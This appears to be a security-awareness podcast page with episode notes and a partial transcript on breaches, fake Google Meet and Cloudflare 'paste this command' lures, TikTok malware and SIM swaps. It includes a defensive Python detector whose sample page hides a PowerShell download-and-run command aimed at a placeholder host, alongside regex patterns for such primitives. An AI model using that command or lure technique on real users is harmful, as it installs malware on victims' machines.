What do Victoria’s Secret, TikTok, and a Scottish train station have in common?
They all feature in this week’s episode—alongside malware, fake IT calls, and a growing pile of breached data.
Episode 31 is full of weird, worrying, and very real cyber stories. Retailers are still getting hit. TikTok is spreading malware using AI-generated videos. SIM swap attacks are back. And a voice actor says her voice was cloned by ScotRail without permission. There's also a bit of good news—Microsoft and Apple are making some smart software updates that might actually help.
Let’s break it all down…
🛍️ Victoria’s Secret and Adidas – Different Attacks, Same Worry
Victoria’s Secret pulled down its entire US website after a security incident. Stores are still open, and the UK site is fine, but details are scarce. Meanwhile, Adidas confirmed that customer contact info was stolen via a third-party help desk. No credit cards were taken, but attackers now have names and email addresses—perfect for phishing.
The bigger trend? Help desks being socially engineered to reset passwords or provide access. It’s the same pattern we saw with MGM, M&S, and others. Social engineering is winning because it’s fast and it works. You don’t need zero-days when you can just ask someone nicely.
🎣 AI-Generated TikToks Are Now Spreading Malware
In a particularly grim twist, we found out this week that attackers are using TikTok to distribute info-stealing malware. The videos show fake software tips like “activate Microsoft Office” or “get Spotify Premium for free”—but they’re actually convincing users to open PowerShell and paste in malicious code.
One of these videos racked up half a million views.
This isn’t phishing in the traditional sense. There’s no dodgy link or email. Just a fake video and a bit of social engineering that hits people’s curiosity and FOMO. It’s especially dangerous on BYOD devices—because what gets installed at home could end up back on the corporate network.
📞 Google Meet Scam – Same Trick, New Platform
We also spotted a fake Google Meet error message asking users to “fix” their microphone by pressing Win+R and pasting in a command. It looks like Google Meet, but it’s a full clone, and the code gets copied to the clipboard automatically. You barely have to think. Just press, paste, and enter. And just like that, someone else has control of your device.
Same goes for fake Cloudflare verifications targeting WordPress admins and even a Coursera-themed phishing campaign that leads to a fake Facebook login page. It's all part of a wider trend: fewer links, more human behaviour tricks.
The lesson? If a webpage tells you to open PowerShell or press Win+R, don’t do it. Ever.
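The pattern described above (a page that silently writes a command to the clipboard and then tells the visitor to press Win+R, Ctrl+V and Enter) is simple enough to check for mechanically. Below is an added example, not code from the podcast or from any of the vendors it cites, that scores a page's HTML on three cues: a clipboard-write call in its script, on-screen Run-box instructions, and a PowerShell one-liner that downloads and executes something. The regexes, thresholds and the three sample pages are my own constructions; real detections would tune them against live telemetry.

```python
import re
from dataclasses import dataclass

# Cue 1: script that writes to the clipboard (navigator.clipboard.writeText / execCommand('copy')).
CLIPBOARD_WRITE = re.compile(
    r"navigator\.clipboard\.writeText\s*\(|document\.execCommand\(\s*['\"]copy['\"]\s*\)",
    re.IGNORECASE,
)

# Cue 2: visible instructions walking the user through Run box -> paste -> execute.
RUN_BOX_STEPS = {
    "win_r": re.compile(r"\bwin(dows)?(\s*key)?\s*\+?\s*r\b", re.IGNORECASE),
    "paste": re.compile(r"\bctrl\s*\+?\s*v\b|\bpaste\b", re.IGNORECASE),
    "enter": re.compile(r"\bpress\s+enter\b", re.IGNORECASE),
    "powershell": re.compile(r"\bpowershell\b", re.IGNORECASE),
}

# Cue 3: download-and-run primitives commonly seen in the copied command.
DOWNLOAD_AND_RUN = re.compile(
    r"(\biex\b|invoke-expression|invoke-restmethod|invoke-webrequest|downloadstring|\birm\b|\biwr\b|-enc(odedcommand)?\b)",
    re.IGNORECASE,
)


@dataclass
class Verdict:
    clipboard_write: bool
    steps: list
    download_and_run: bool

    @property
    def suspicious(self) -> bool:
        # Assumed rule: a clipboard write is only interesting when paired with
        # either two or more Run-box step cues or a download-and-run payload.
        # An ordinary "copy link" button or an IT help page on its own does not trip it.
        return self.clipboard_write and (len(self.steps) >= 2 or self.download_and_run)


def analyse(html: str) -> Verdict:
    """Return which cues are present in the page source."""
    steps = [name for name, rx in RUN_BOX_STEPS.items() if rx.search(html)]
    return Verdict(
        clipboard_write=bool(CLIPBOARD_WRITE.search(html)),
        steps=steps,
        download_and_run=bool(DOWNLOAD_AND_RUN.search(html)),
    )


# Constructed sample 1: a meeting-page clone in the style the episode describes.
CLONE = """<html><body><h2>Can't join the meeting</h2>
<p>Press Windows key + R, then Ctrl + V and finally press Enter.</p>
<button onclick="fix()">Try Fix</button>
<script>
function fix(){ navigator.clipboard.writeText('powershell -w hidden -c "iex (irm https://example.invalid/fix)"'); }
</script></body></html>"""

# Constructed sample 2: a benign "copy link" share button.
COPY_LINK = """<html><body><button onclick="navigator.clipboard.writeText(window.location.href)">
Copy link</button><p>Share this page with a colleague.</p></body></html>"""

# Constructed sample 3: an internal IT knowledge-base page that legitimately mentions Win+R
# but never touches the clipboard.
HELP = """<html><body><h1>Restarting the print spooler</h1>
<p>Press Win+R, type services.msc and press Enter, then restart Print Spooler.</p></body></html>"""


if __name__ == "__main__":
    for name, page in (("clone", CLONE), ("copy_link", COPY_LINK), ("help", HELP)):
        v = analyse(page)
        print(f"{name:10} suspicious={v.suspicious} steps={v.steps} payload={v.download_and_run}")
```

Only the clone is flagged: it has all three cues. The share button writes to the clipboard but gives no Run-box instructions, and the help page gives Run-box instructions but never writes to the clipboard, which is exactly the distinction the awareness message relies on.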
🔄 SIM Swap Scams Are Back (And Still Working)
This story came in from a listener—Oli spotted that someone he knows had been SIM swapped. They got a legitimate-looking message from EE confirming a new eSIM had been ordered, then a flurry of calls from an unknown number. They called EE, and yep—it had happened. Their mobile number had been reassigned, and SMS-based logins were no longer theirs.
It’s easy to forget just how much is tied to your phone number. SMS codes. Banking apps. Password resets. All it takes is one help desk that doesn’t ask the right questions. We talk about whether mobile providers should let users lock their SIM from porting—and why EE’s current process is nowhere near good enough.
🧠 The Awareness Angle – Tell People What’s Not Normal
This week’s awareness messaging is simple:
If a website or video asks you to open Run (Win+R), PowerShell, or paste in a command—walk away. It’s not normal. It’s never okay. Your IT team will never ask you to do this.
The same goes for weird login pages, especially if they’re offering something free, urgent, or exclusive. Encourage your users to pause and check before entering credentials or following instructions.
🎙️ ScotRail Voice Controversy – AI and Consent
Voice actor Gayanne Potter recorded some lines for accessibility tools back in 2021. This year, she discovered her voice had been turned into “Iona”—the new voice of ScotRail. She never gave permission for that. She’s spent two years trying to get it removed.
It’s a real-world version of the video we made last year—Likeness. It’s about how easily your identity can be used by an AI system once you've signed the wrong contract or clicked "agree" without reading. There’s currently no legal protection in the UK for voice or likeness. GDPR might not even apply if the company owns the original recordings.
This one’s a wake-up call for anyone working with audio, video, or their face and name online. Creators deserve more protection. And organisations using AI need to be upfront about how and why they’re doing it.
💰 Would You Sell Your Data for £40 a Month? Gen Z Might.
A new app called Verb.AI is paying Gen Zers $50 a month to track their scrolling, clicking, and buying. It builds a “digital twin” that companies can query like a chatbot to understand habits and preferences. It’s being sold as a fair value exchange. But is it?
Apparently, 88% of Gen Z are okay with sharing personal data if there’s compensation. And yet they’re also more likely than older generations to use encrypted messaging, block cookies, and browse privately. There's a tension here between knowing the risks and doing it anyway. And it’s something awareness teams need to understand.
The takeaway? Awareness isn’t just about teaching risk—it’s about helping people care. Especially when short-term rewards (like £40 a month) seem more tangible than long-term data consequences.
🔄 Smaller Bits Worth Your Time
WhatsApp is now offering passkey support for login—so you can ditch SMS codes and use fingerprint or face unlock instead.
Microsoft is building a new update orchestrator that will automatically patch all your drivers, apps, and system components in one go.
Apple’s switching to year-based naming for their OS updates—iOS 26, macOS 26, and so on—alongside a full redesign coming at WWDC.
🧠 The Awareness Angle – This Week’s Takeaways
Don’t Run Commands from Random Websites
That might sound obvious to security folks, but if TikTok videos and fake error messages are convincing thousands of people to paste code into PowerShell, we’ve still got work to do.
Tell Better Help Desk Stories
Attackers are getting in by calling IT. Seriously. The same way someone could walk into McDonald’s wearing a uniform and say “I work here now.” Teach your people to question unexpected requests, even from inside.
People Care About People, Not Protocols
£300 million lost. A cloned voice. A password on a post-it note. These are the kinds of details that stick. So make sure your awareness stories are human—not just technical.
🎙️ Quick Plugs
We’re up for Best Newcomer and Back to Basics at the European Cybersecurity Blogger Awards 2025. Results announced Wednesday 5th June at InfoSec Europe. Ant will be there—say hi if you’re around!
Don’t Miss It!
Our Awareness Angle Interview with Sara Carty from Unboring is out on Thursday.
It’s full of honest chat about drama school, storytelling, cyber marketing, and why we need to ditch blue, padlocks, and hoodie stock images.
Listen back—this one’s got loads for awareness pros.
Sign up for The Awareness Angle Newsletter today and get notified every time a new episode is released. Each newsletter contains details of the topics discussed and more from the world of Security Awareness.
📉 Victoria’s Secret Breach
Watch – https://youtu.be/XgogrdK_NvU?t=149
Read – https://www.bbc.co.uk/news/business-69081682
👟 Adidas Helpdesk Cyber Attack
Watch – https://youtu.be/XgogrdK_NvU?t=190
Read – https://www.bbc.co.uk/news/technology-69073785
📹 TikTok Malware via PowerShell Commands
Watch – https://youtu.be/XgogrdK_NvU?t=384
Read – https://www.infosecurity-magazine.com/news/ai-tiktok-infostealer-malware/
🪟 Microsoft’s Unified Update System
Watch – https://youtu.be/XgogrdK_NvU?t=523
Read – https://www.windowscentral.com/software-apps/windows-11/microsoft-is-working-on-a-unified-update-platform-to-keep-your-pc-up-to-date
🍎 Apple OS Rename: iOS 26 and macOS 26
Watch – https://youtu.be/XgogrdK_NvU?t=723
Read – https://9to5mac.com/2025/05/28/ios-26-name-change/
📄 Tajikistan Targeted via Word Macros
Watch – https://youtu.be/XgogrdK_NvU?t=847
Read – https://www.bleepingcomputer.com/news/security/russia-aligned-tag-110-targets-tajikistan-with-dotm-files/
☁️ Fake Cloudflare Verification Scam
Watch – https://youtu.be/XgogrdK_NvU?t=996
Read – https://www.wordfence.com/blog/2025/05/fake-cloudflare-page-malware/
🎥 Fake Google Meet PowerShell Attack
Watch – https://youtu.be/XgogrdK_NvU?t=1080
Read – https://www.cyware.com/news/new-phishing-scam-fake-google-meet-page-tricks-users-into-running-malware-67df4f27
🎓 Coursera/Meta Phishing Scam
Watch – https://youtu.be/XgogrdK_NvU?t=1214
Read – https://cofense.com/blog/fake-meta-certificates-coursera-phishing-campaign/
📱 SIM Swap Attack on EE
Watch – https://youtu.be/XgogrdK_NvU?t=2490
Read – https://community.ee.co.uk/t5/Mobile-Services/SIM-Swap-Scam-warning/m-p/1317527
💵 Gen Z Selling Their Data for $50/month
Watch – https://youtu.be/XgogrdK_NvU?t=2880
Read – https://www.fastcompany.com/91134124/gen-z-selling-personal-data-verb-app
🎙️ ScotRail AI Voice Controversy
Watch – https://youtu.be/XgogrdK_NvU?t=3133
Read – https://www.bbc.co.uk/news/uk-scotland-69085678
📜 T&Cs Tool – TOSDR.org
Watch – https://youtu.be/XgogrdK_NvU?t=3505
Read – https://tosdr.org/
🔐 WhatsApp Adds Passkey Support
Watch – https://youtu.be/XgogrdK_NvU?t=3660
Read – https://www.whatsapp.com/blog/passkeys-on-android
📧 Phishing Email Spoofing Luke
Watch – https://youtu.be/XgogrdK_NvU?t=3773
Missed the episode? Watch it below!
Anthony Davis (00:03.011)
Welcome to the awareness angle where we break down the latest cyber security stories and look at what they really mean for awareness, behaviour and staying safe. With me as always is my co-host Luke. Hello Luke.
Luke (00:17.29)
and everyone yeah well thank you
Anthony Davis (00:18.995)
How you doing?
Yeah, good, good. It's a bit warm. It's kind of a muggy night, a proper summery night here, or maybe it's just my carriage where I am is hot. Anyway, this week underwear and sportswear get attacked. Malware and phishing stories are everywhere. There's a chunk of those, so we whizz through those. And we've got loads of cool stuff this week, so it's gonna be a good one. So we'll break it down, no jargon, no drama,
Luke (00:25.55)
you
Luke (00:29.144)
Yeah.
Anthony Davis (00:51.197)
just what you need to know, but just what you need to know, just what you need to know. But before we get running, this is of course an independent podcast. Our views are our own. So if we say something you don't like, we don't agree with, blame us. Don't blame the people that pay us for a living. So this is independent. All right, moving on really swiftly, European Cybersecurity Blogger Awards.
Voting is now closed. Thank you to everyone who has voted for us in the European Cyber Security Blog Awards 2025. We got nominated twice, Back to Basics Award and the Best Newcomer Award and I also got nominated as a contributor as well. So that's really cool. We find out Wednesday, this episode comes out Monday. Wednesday is the ceremony, so if you are at InfoSec Europe, get yourself.
to the Cyber 100 Club on Wednesday night. I'm gonna be there and we'll find out if we walk away victorious. We're up against loads of good established quality competition.
Luke (01:57.26)
Yeah, you'll be there to collect free trophies.
Anthony Davis (02:00.418)
That'd be nice, that'd be nice. Two would be handy because then we can have one each. Yeah, yeah. Anyway, if you're listening to this, tune into the next episode to find out if we won anything. Right, let's crack straight on with the news. A whole bunch of stories this week. Retailers are still being hit
Luke (02:05.526)
Yeah, in the background.
Anthony Davis (02:29.082)
in the news, breaking news today as we record. It is Victoria's Secret, the famous underwear retailer, has taken down its US website after a security incident. Stores do remain open and the UK website is unaffected, so it's just the US website. Apparently they're working with third party experts, but that's all we know. Their share price has dropped as normally happens with these kind of things.
So yeah, if you shop with Victoria's Secrets in the US, you might want to change your password, make sure you've got 2FA and all of that. That's pretty much all we know. Yeah?
Luke (03:10.594)
Yeah, it falls onto the next one, which is the Adidas story. So, yeah, a couple days ago, this one was where Adidas disclosed that they've been hit as well by a cyber attack and customer personal information has been stolen from this. And it seems to be for a third party with their help desk, this sort of system, I believe it says. So anybody that's been in touch with that system has been affected and...
It says about that passwords and credit cards haven't been compromised. And they said that they're fully committed to protecting privacy and security of our consumers and sincerely regret any inconvenience or concern caused by the incident. And they posted that on the website on the 24th of May that was. So it's actually been a while ago, but that's all the thing that there is for this one.
Anthony Davis (04:04.816)
The trend here is help desk staff. I'm not saying that we should blame help desk staff. Help desk staff, you know, social engineering is the way forward. I'm actually reading about this on The Register, and Javvad Malik, who's obviously at KnowBe4, is quoted as saying, while payment data wasn't compromised,
theft of personal contact details poses risks for phishing and other social engineering attacks, so affected customers will need to be vigilant for any communications which appear to originate from Adidas. I'm gonna go one better than Javvad and just say don't trust anything from anyone ever, because everybody's getting breached. They might be breached before you even know it. Just trust your gut on this one. If you get a strange message from someone, don't trust it.
Luke (04:44.898)
Yeah.
Luke (04:57.421)
Hmm.
Anthony Davis (04:59.11)
Yeah, it's at some point. This is mad, isn't it? it's just like dominoes. Yeah.
Luke (05:05.166)
every day now at the moment and I think the last episode or two we touched on about how Google said that they were pivoting to US companies but yeah it doesn't say there's a link between these but it's a little bit coincidence maybe
Anthony Davis (05:23.686)
The thing is, right, now they know that that's a vector that works, because it worked with MGM, it worked with Co-op, it worked with M&S. Socially engineering a help desk to reset a password means you get access without needing to compromise a system or service, because you can just assume the identity of someone. It's like buying a uniform off eBay and turning up at McDonald's wearing a uniform. I'm new here. No one's gonna question you.
Luke (05:40.942)
Yeah.
Switch it if they're...
Yeah.
Luke (05:53.127)
especially if you're dated SMS codes and stuff like that.
Anthony Davis (05:59.025)
This is prime example. SMS, like companies that still have SMS as an authentication factor.
Luke (06:04.654)
or even just one time codes can be just as bad.
Anthony Davis (06:08.944)
Yeah, yeah. Yes. What do we do? No doubt there'll be more next week. No doubt. Right, I'll move on to the next one. There'll probably be more about that later on in the show. Next up tonight: AI-generated TikTok videos being used to distribute infostealer malware, and
Luke (06:11.746)
Yeah.
Luke (06:16.718)
Yeah, I know.
Anthony Davis (06:38.546)
This is basically, there's video and there's some really basic advice about this, which we'll get to see. This is from Info Security Magazine. So TikTok, there's videos that are generated that are pushing out. And this doesn't depend on anything. This is entirely within TikTok. And they instruct users to execute PowerShell commands.
And these are like, you can activate Microsoft Office. You can activate Spotify without an account. Open up PowerShell, type this in. It's like, no. So it's basically tricking people thinking they're gonna get something cool and for free. Probably, it doesn't mention it, but it's exactly like, you can get Photoshop for free. Just open up PowerShell and type in this code. But what the code actually does is obviously give someone remote access to your machine or
download some infostealing malware and they'll just scoop up all of your information. The message here for your people is, if anyone or any system or any webpage tells you to open up PowerShell or press Win and R, do not do it. It's quite simple.
Luke (07:55.402)
Yeah, I we touched on that recently as well didn't we? Somewhat that... running a command. Which I mean you'd hope people wouldn't have admin rights or maybe some cases it may not need it but... Well for home yeah, especially BYOD devices as well. Stealing all the work credentials at the same time.
Anthony Davis (07:59.344)
It did, yeah.
Anthony Davis (08:09.074)
Most home users will have admin rights though.
Yeah.
Anthony Davis (08:22.874)
Yes, so if you're on TikTok and it asks you to open up PowerShell or something, just don't do it. It's just not the good idea. If you're going somewhere you are unfamiliar with, probably like don't walk down any dark alleys. It's the same kind of feeling as that.
Luke (08:32.033)
No.
Luke (08:43.854)
Cool, the next story we've got is Microsoft now want to update all of your Windows software and drivers in one sort of automated, unified way. It's a new feature that's in private preview at the moment.
It's quite a technical sort of explanation but I guess essentially it's just about making everything smoother and taking less sort of a load on your PC of slowing you down whilst it's trying to download and potentially start installing updates in the background. It's just about making it a bit smarter with when it does this for you and can sort of get updates handled without you really realising, I guess, is the sort of idea and fewer pop-ups and stuff like that.
and hopefully yeah, guess the goal is to keep your system up to date more efficiently and quietly without interrupting you. I don't know. Yeah, I'm surprised it's not, I feel like it's already the thing, but I guess it's...
Anthony Davis (09:37.434)
I think this is a great thing. I have to be honest.
Anthony Davis (09:46.067)
I think it's a thing for some, it definitely never used to be a thing, and I think it is a thing for some drivers and software. But I look at my computer right now, right, and this Windows machine that I'm running this on, I've got the Intel driver and support assistant that has two updates available. I only know that because I noticed it earlier and I looked for it. These updates, it seems to always have updates available, but I've double clicked on it and it's just taken me to a dead page.
Luke (09:52.631)
Yeah.
Anthony Davis (10:15.934)
It's like, it's asking me to choose a product or search support, so it's not really working, but normally that's a Bluetooth driver and a Wi-Fi driver that seem to update quite frequently. Nvidia's the other one, there's always a driver there to install, but unless I notice the red dot or see a notification, I don't know.
Luke (10:25.218)
Yeah.
Luke (10:34.318)
Yeah, I think it says here as well about... obviously it's a Windows 11 feature and it says about for IT admins there's a consistent management plane and experience that's sort coming along with it. They call it like an orchestrator. Be interesting to see what that looks like.
Anthony Davis (10:53.596)
hadn't even considered, you said that, I hadn't even thought about that from a business perspective. That's even better. For all of the bad stuff Microsoft had done over the past few weeks with Copilot and that, this is a positive, I think.
Luke (11:03.683)
Yeah.
Luke (11:13.112)
Mm-hmm. Yeah, it seems to be in private preview. I don't know when it's coming out.
Anthony Davis (11:20.508)
The other place this could be good is when you've got those software packages like WinRAR or Audacity for example. Audacity is one that I've used on and off to do some audio editing or whatever. And every time I open it, it tells me that there's an update to install. Maybe I don't open it frequently enough and I'm following their update schedule. But unless I open it, it doesn't tell me that there's an update to install. And then if I open it, I wanna start using it, so maybe I'm like, I don't wanna.
Luke (11:38.872)
you
Anthony Davis (11:50.279)
do it now, I'll do it next time because I want to just get this done. So if it's updating in the background without me knowing and Windows is just handling that for me, thank you very much. Very, very nice.
Luke (11:52.75)
Yeah.
Luke (12:00.544)
and that sounds good.
Anthony Davis (12:03.152)
Hmm. Move it over to Apple now. And this is brilliant as well. Apple, when they launch the next version of iOS, macOS, iPadOS. Okay, that's not good. When they launch the next version of their software, they're moving up numbers and they're gonna basically, the next one's gonna be called 26. So they're gonna reflect the year of release rather than the version.
Luke (12:33.166)
interesting choice.
Anthony Davis (12:34.374)
and that's going to carry on across the whole iOS, macOS, iPadOS, watchOS probably. So you'll know straight away how old your operating system is, which I think is quite nice. They're apparently going to announce this at the Worldwide Developer Conference on June the 9th, designed to simplify branding, and it's going to debut alongside
Luke (12:41.987)
there.
Anthony Davis (13:03.896)
redesigned user interfaces, codenamed Solarium. I have heard that the next version of, it's a big redesign this time, like there's been one big redesign, I think, in the history of iPhone, I think there's been one significant change, and I think this is the next significant change, so.
Luke (13:25.112)
Yeah, it's interesting.
Anthony Davis (13:27.154)
We'll find out. there's Vision OS as well. I forgot about Apple Vision. There's Vision OS. Right. Well, they're the big news stories.
Luke (13:32.332)
Mmm.
Anthony Davis (13:41.585)
I've got five more news stories, but they all kind of complement each other. This week, I noticed a massive abundance of phishing and scam related stuff that was all kind of, none of it made the headlines, but these are all really valuable stuff that awareness professionals and cyber professionals probably need to be aware of. So I can start with the first one, which is,
Russia-aligned TAG-110 targets Tajikistan. So the nation of Tajikistan has been targeted using phishing attacks. But the interesting thing with this is that they're Word template files. So they've specifically targeted the government of Tajikistan with macro-enabled Word documents. So,
if, like, the takeaway on this, I don't need to say any more on this. Why do you need to receive DO, what are they? It's a really technical document. Why do you need to receive .DOTM files by email? You probably don't. So block it, right? Just go to whoever manages your email gateway and just say any attachments that are .DOTM, we?
Luke (14:46.176)
Mm-hmm.
Luke (14:59.276)
No.
Anthony Davis (15:10.65)
Add them to quarantine or get rid of it. Because you probably don't need to be receiving them.
Luke (15:12.865)
Yeah.
Luke (15:16.96)
interesting the macros are never going away it seems.
Anthony Davis (15:20.814)
No, no, and there's, we'll put a link to this in the newsletter and stuff, but there's a very, very technical coverage of this. I just thought it was funny, like the old techniques. You know, what decade is this? We're still word, macro enabled word files. Yeah, we've been talking about that for as long as I've been doing awareness. That's been a threat vector, so.
Luke (15:31.918)
Mm-hmm.
Luke (15:40.738)
Yeah, flat Excel macros as well. Word templates is a of a new one to me.
Anthony Davis (15:44.86)
Yeah
Anthony Davis (15:49.233)
Yeah, and I get that in some organizations, there's like some large organizations are held up by very old Excel spreadsheets running macros. And I get that that's the thing, but you don't need to receive them. Like you need macros enabled maybe, but you don't need to be receiving them via email. no. Well, there's the layers, isn't it? Like number one, we do email them around. Right, but do they come from...
Luke (16:09.88)
not from external people anyway
Anthony Davis (16:18.694)
Outside domains, no. So there's one way to block it. Do you have to share them via email? Could you share them via Slack or Teams or something or SharePoint? You know, there's another way to look at it. Yeah.
Anthony Davis (16:36.156)
The next one I saw, and this is something we've covered before, similar, so fake Cloudflare verifications. You know when you sign into something and you get the Cloudflare box that says, verify you are human. So apparently, and this leads on to what I've just said previously, this is targeting WordPress sites, and it essentially tricks victims into following a set of commands.
When you click on the Cloudflare box, it then asks you to press Win plus R to open Run and then asks you to copy and paste a command in. And this is something we've spoken about ages ago. So we don't really need, Cloudflare will not ever tell you to do this. So make your people aware that this is what good behaviour looks like and this is what bad behaviour looks like.
Luke (17:36.322)
Yeah.
Anthony Davis (17:37.01)
Cloudflare asking you to paste code into a run box is not expected behaviour.
Luke (17:44.846)
Yeah.
Anthony Davis (17:49.17)
Do you want the next one? I told you I'd whisk through these.
Luke (17:51.566)
It seems like the same sort of thing with a PowerShell malware tricking users into running it.
Anthony Davis (17:55.268)
I just...
Anthony Davis (18:00.273)
Google Meet, it's essentially a fake Google Meet page and it doesn't present a login form but it's again saying microphone permission denied and it asks you to copy and paste a PowerShell command. There's another one, the screenshot on this one says you can't join the meeting, try fix and the try fix will tell you to paste a command.
Luke (18:19.022)
That's incredible.
Anthony Davis (18:30.96)
It says Windows key and R, then Control and V. The webpage, this is the clever thing, the webpage automatically copies the code to the clipboard. So it's there. So you haven't got to highlight anything. I don't want to bombard you with screenshots, but let me just show you this one, because this one's quite telling. Let me just pull this up. If you are listening to this, don't forget you can, of course,
Luke (18:41.293)
Right.
Click on the button there.
Anthony Davis (18:59.334)
watch us on YouTube and then see the screenshots in all their glory. So you can see here, this looks like Google Meet and it says can't join the meeting, press Windows key R then Control and V and finally press Enter. At which point it's too late. You're like, that's game over.
Luke (19:15.009)
Yeah.
It's quite a tricky bit of a trick isn't it really? The run window appears in the bottom left so you almost could do it without really looking and if you're not a proficient Windows user you might not know what Windows R does and then you've done it.
Anthony Davis (19:33.434)
Again, hadn't thought of that, but yeah. Like I've just pressed WinR and you can barely notice it down in the bottom left hand corner because it doesn't come up front and centre. Maybe that's one way that Microsoft maybe should change because that's always been tucked in the bottom left hand corner. Like every bit.
Luke (19:54.136)
probably should ask you, are you sure you want to run this command? Maybe there's a way doing that.
Anthony Davis (19:58.011)
That would be nice. That would be nice. Yeah. Maybe, maybe it has, maybe Windows should have some built in sandbox to tell you like this command is going to do this. Do you want to run this command?
Luke (20:06.958)
Hehehe.
Luke (20:11.48)
Yeah.
Anthony Davis (20:14.514)
So that was that one. The next one. So Coursera. And this was a post I saw from PhishMe this week. And this is basically three courses being offered on Coursera, which is a training platform like Udemy. And you get an email and it says,
Coursera team, it's from the Coursera team, with a subject that translates to get your free Meta certificate in social media marketing now. And this has come from, like, the sender address doesn't match the Coursera domain, obviously. And then when you click on it, it asks you to sign up into Facebook. And then when you click the continue with Facebook button,
it doesn't actually take you to Facebook. It takes you to a fake Facebook login page. And the domain isn't facebook.com. The domain is the phishing, the same domain. And it just takes you to a fake Facebook login page.
Luke (21:17.538)
Hmm.
Anthony Davis (21:23.538)
Yeah, it's again something free unfamiliar domains
Luke (21:31.596)
Yeah, last thing to log in with your plain credentials like that.
Anthony Davis (21:31.858)
It's just not great.
Anthony Davis (21:37.211)
Yeah, it's, I mean, if you're using Facebook in this day and age and you haven't got multi-factor authentication enabled, that's one thing you should be telling your people. Go to Facebook, do a lovely little campaign on how to set up. We did one years ago where we basically took like the five or six big social media platforms and we gave instructions of how to configure 2FA on those accounts.
Luke (22:05.602)
Yeah.
Anthony Davis (22:06.31)
doesn't take people long and it's really easy to do. You could almost do one a week or one if you do a bi-weekly newsletter. This week we're going to tell you how to secure your Facebook account. There's some free content, right? If you're looking for things to talk about.
Luke (22:17.741)
Yeah.
Just thinking as well, as we touched on previously with passkeys, now you can probably, well, I just googled it, but a lot of these platforms support passkeys now. But it seems that Facebook may not be available to everybody, it says, and they only really talk about on an iPhone. But it's worth maybe looking at switching to passkeys for some of these platforms.
Anthony Davis (22:46.81)
I wonder if, I remember this being a problem with, because the iPhone was the first to properly do Face ID, because they own the whole ecosystem. And Android didn't do Face ID because it doesn't have the LiDAR camera. Not all of them do. I mean, you remember a time when a fingerprint reader was a new thing on a mobile phone.
Luke (23:06.924)
Yeah.
Luke (23:15.054)
Mm.
Anthony Davis (23:16.24)
Yeah, that's interesting.
Right, that's enough of those, because we've got fake phishing pages, we've got Google Meet. Tell your people, these are great examples. It's clearly working. People are clearly falling for this, because if they didn't, they wouldn't build them, right? People are doing this because it works. So you need to tell your people, if a webpage asks you to press Win R, walk away, close it, don't do it.
this is like nothing good. There's no legitimate reason that a webpage should tell a user to run a command in a run box. There just isn't. In all my years, I'd never needed to do that from an instruction from a webpage. And I rarely need to do that now. It's only, yeah, like going back to help desk. You wanna get into task manager or services or something like that, or your task bar's frozen or disappeared. That's the only
Luke (23:58.146)
No.
Luke (24:06.338)
Not you're trying to fix something on your computer, but yeah.
Luke (24:18.67)
You
Anthony Davis (24:19.846)
That's the last time I ran it, I think, when my start menu crashed. But that's because I was doing funky things with my computer. There's no legitimate reason to run commands, to paste commands into a run box as instructed by a web page. So you need to tell your people that.
Luke (24:24.003)
Yeah.
Luke (24:37.11)
Definitely.
Anthony Davis (24:38.802)
We'll put links to all of those in the newsletter. The newsletter is available every week alongside every single episode and it contains links and details of all of the stories that we discuss every week. We have over 600 subscribers now. That number's going up week on week, which is amazing, thank you. Yeah, it's brilliant. So 600 subscribers to the news, more than 600 subscribers to the newsletter. And it's free.
Luke (24:56.494)
That's incredible.
Anthony Davis (25:07.58)
It comes out every week. You can get it in your inbox by going to riskycreative.com. You can sign up there. Or you can get it on LinkedIn. That's where most people get it. So you can search on LinkedIn for The Awareness Angle, and that's available on LinkedIn. Or me. 612 subscribers we have at the moment on LinkedIn. And we've got more on email. That's awesome.
Luke (25:26.828)
No, that's great.
Luke (25:30.99)
And that's where all the good stuff is in the newsletter after we've had time to think about what we've said in the episode and write it down in a better way.
Anthony Davis (25:35.25)
all the good stuff.
Anthony Davis (25:40.179)
That's where the really valuable awareness angles are, because we've had time to chew it over and we've talked about it and then we come out the other side. It's like, why didn't I say that? Yes, and don't underestimate it. Like, doing the video, we record this and then Luke goes away and makes it look and sound great, which is an art in itself, and then we'll go away and do the newsletter as well. And it's, yeah, it's a lot of work, but we do it because we love doing it, so.
Luke (25:46.99)
Yeah
Anthony Davis (26:09.584)
Don't forget as well, if you see a story that you want to talk to us about or you think we should consider on the show, reach out. We've got people that do. Hayden, that you know, reaches out every couple of weeks with something, and now Oli at Tesco reaches out quite often as well. So I've got something from him a little later. So yeah, reach out, get in touch. hello@riskycreative.com, or message Luke, or message me on LinkedIn. Right, awareness, awareness.
Luke (26:29.272)
That's good.
Anthony Davis (26:39.078)
cooking on gas this week this is good
Luke (26:40.952)
You
Anthony Davis (26:43.002)
This week is of course Infosecurity Europe. It's on at ExCeL in London, Tuesday, Wednesday and Thursday I think. It's like, this is the big one. We've been to some others but this is normally the big one. And I'm gonna be there Wednesday, might be there Tuesday as well. So if you're about, keep an eye out, give us a shout and come and say hello.
I might do a bit of filming, might say hi to a few people and I might bring something to next week's episode. I might do, no promises. And of course, Wednesday at the Cyber 100 Club is when we find out if we are winners or losers, so.
Yeah. If you're going to be at Infosec Europe this week and you want to reach out or you want to meet up, give us a shout.
Luke (27:31.886)
as I was
Anthony Davis (27:41.667)
Next, in two weeks' time, The Future of Cyber Security virtual conference. I am speaking. I've got a little slot. I've got a great little story to tell about awareness and storytelling. But I'm just a warm-up act. We've got Lee Morton. We've got Holly Foxcroft. And then headlining is the man that saved the internet, Marcus Hutchins. Obviously, he's the man that stopped WannaCry from happening. So.
Yeah, it's gonna be a great event. It's virtual. You can sit at home comfortable or at your desk with your headphones on and listen to it. It's gonna be good. So that's on the 12th of June. Details of how to attend and register are of course in the newsletter.
Luke (28:19.182)
yeah.
on to.
Luke (28:28.302)
once it's on up full.
Anthony Davis (28:33.08)
Right, comments. I haven't prepared anything this week. Let me just dive on there and see if there's anything. I haven't posted loads this week, I have to be honest. It's been a very, very busy week for me. But last week we did cover, we covered a section on old versions of Windows. We talked about Windows XP that was still in use in a hospital lift and ATM machines.
Luke (28:40.27)
Thank
Luke (28:59.811)
Mm-hmm.
Anthony Davis (29:00.764)
We've got a couple of comments on those. Someone says they went on a pharma site that still uses the old PCs they used in the Cold War. SCADA is like an old teletext.
Anthony Davis (29:16.956)
That's secure by obscurity, surely. Someone says, maybe it's okay to use old computers if it works. This is just American consumerism conning us to use new versions that add nothing useful.
Anthony Davis (29:37.446)
Okay. Yeah.
Let's leave the comments there for this week.
Luke (29:43.519)
Hehehe
Anthony Davis (29:45.445)
